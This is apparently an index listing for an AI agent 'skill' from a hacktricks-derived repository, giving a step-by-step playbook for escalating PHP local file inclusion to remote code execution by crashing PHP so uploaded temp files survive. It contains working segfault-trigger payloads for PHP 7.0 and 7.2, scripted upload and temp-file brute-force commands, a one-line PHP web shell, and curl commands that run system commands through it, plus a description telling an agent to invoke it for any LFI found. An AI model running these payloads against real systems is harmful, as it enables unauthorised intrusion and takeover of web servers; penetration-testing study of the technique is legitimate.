OpenSkillIndex← back to search

Hacktricks-skills lfi2rce-segmentation-fault

Exploit Local File Inclusion (LFI) vulnerabilities to achieve Remote Code Execution (RCE) by triggering PHP segmentation faults that leave temporary upload files undeleted. Use this skill whenever you find an LFI vulnerability in a PHP application and want to escalate to RCE, especially when file upload functionality exists. Trigger this skill for any LFI exploitation, PHP segmentation fault attacks, or when you need to brute-force temporary PHP file paths.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault/SKILL.MD
source content

LFI2RCE via Segmentation Fault Exploitation

This skill helps you exploit Local File Inclusion (LFI) vulnerabilities in PHP applications to achieve Remote Code Execution (RCE) by triggering segmentation faults that prevent cleanup of temporary upload files.

Technique Overview

When PHP processes a POST request containing a file upload, it creates a temporary file in 

/tmp/php<random_string>
. Normally, this file is automatically deleted after request processing. However, if you trigger a segmentation fault in PHP during processing, the temporary file is never deleted and remains accessible via LFI.

The Attack Flow

  1. Find LFI vulnerability - Identify a parameter that includes files
  2. Trigger segmentation fault - Send a POST request with file upload + malicious LFI payload
  3. Brute-force temp file - Search for the undeleted temporary file using LFI
  4. Execute arbitrary code - Include the temp file containing your payload

PHP Version-Specific Payloads

Different PHP versions require different segmentation fault triggers:

PHP 7.0

include("php://filter/string.strip_tags/resource=/etc/passwd");

PHP 7.2+

include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Prerequisites

  • PHP application with LFI vulnerability
  • File upload functionality (POST with file parameter)
  • Knowledge of the include parameter name (e.g., 
    ?i=
    , 
    ?file=
    , 
    ?page=
    )
  • Access to run Python scripts (for automation)

Exploitation Steps

Step 1: Upload File with Segmentation Fault Payload

Use the 

upload-segfault.py
script to send a POST request with your malicious file while triggering the segmentation fault:

python scripts/upload-segfault.py \
  --url "http://target.com/index.php" \
  --include-param "i" \
  --php-version "7.0" \
  --payload-file "shell.php"

Parameters:

  • --url
    : Base URL of the vulnerable application
  • --include-param
    : Name of the LFI parameter (e.g., 
    i
    , 
    file
    , 
    page
    )
  • --php-version
    : Target PHP version (
    7.0
    or 
    7.2
    )
  • --payload-file
    : Your PHP payload file to upload

Step 2: Brute-Force Temporary File Name

The temporary file is named 

/tmp/php<random_string>
. Use the brute-force script to find it:

python scripts/bruteforce-temp-file.py \
  --url "http://target.com/index.php" \
  --include-param "i" \
  --marker "spyd3r" \
  --threads 10

Parameters:

  • --url
    : Base URL of the vulnerable application
  • --include-param
    : Name of the LFI parameter
  • --marker
    : String to search for in response (something unique in your payload)
  • --threads
    : Number of parallel threads (default: 1)

Step 3: Verify and Execute

Once the temporary file is found, you can include it directly:

curl "http://target.com/index.php?i=/tmp/phpFOUND_FILENAME"

Testing Environment

For local testing, use the Docker image:

docker run -d -p 8008:80 easyengine/php7.0

Example Workflow

# 1. Create your payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# 2. Upload with segmentation fault trigger
python scripts/upload-segfault.py \
  --url "http://localhost:8008/index.php" \
  --include-param "i" \
  --php-version "7.0" \
  --payload-file "shell.php"

# 3. Brute-force the temp file
python scripts/bruteforce-temp-file.py \
  --url "http://localhost:8008/index.php" \
  --include-param "i" \
  --marker "spyd3r" \
  --threads 20

# 4. Execute commands via the included file
curl "http://localhost:8008/index.php?i=/tmp/phpABC123&cmd=id"

Important Notes

  • Timing matters: The segmentation fault must occur during request processing, before the temp file cleanup
  • File naming: PHP temp files follow the pattern 
    /tmp/php<random_string>
    (typically 6-10 characters)
  • Marker detection: Include a unique string in your payload to detect successful inclusion
  • Thread safety: Use multiple threads for faster brute-forcing, but be mindful of rate limiting
  • PHP versions: Test both payload variants if you're unsure of the target PHP version

Troubleshooting

No temp file found after upload

  • Verify the segmentation fault payload works for the target PHP version
  • Check if the file upload is actually being processed
  • Try both PHP 7.0 and 7.2 payloads

Brute-force too slow

  • Increase thread count with 
    --threads
  • Reduce charset if you know the file naming pattern
  • Check network latency to the target

Segmentation fault not triggered

  • Confirm the LFI parameter accepts 
    php://filter
    wrappers
  • Some PHP configurations disable certain filters
  • Try alternative segmentation fault payloads from research

References